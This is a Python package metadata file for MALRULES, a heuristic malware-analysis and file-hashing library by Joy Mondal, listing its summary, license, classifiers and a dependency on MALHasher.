Metadata-Version: 2.1
Name: MALRULES
Version: 0.1
Summary: MALRULES is a Python package for heuristic malware analysis and file hashing. It provides functionalities to analyze files for potential malware by checking for suspicious patterns, API calls, and strings. The package also includes utilities for generating SHA256 and SHA1 file hashes using the MALHasher library.
Home-page: https://github.com/codewithjoymondal
Author: Joy Mondal
Author-email: Contact.Joymondal@gmail.com
License: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
License-File: LICENSE
Requires-Dist: MALHasher
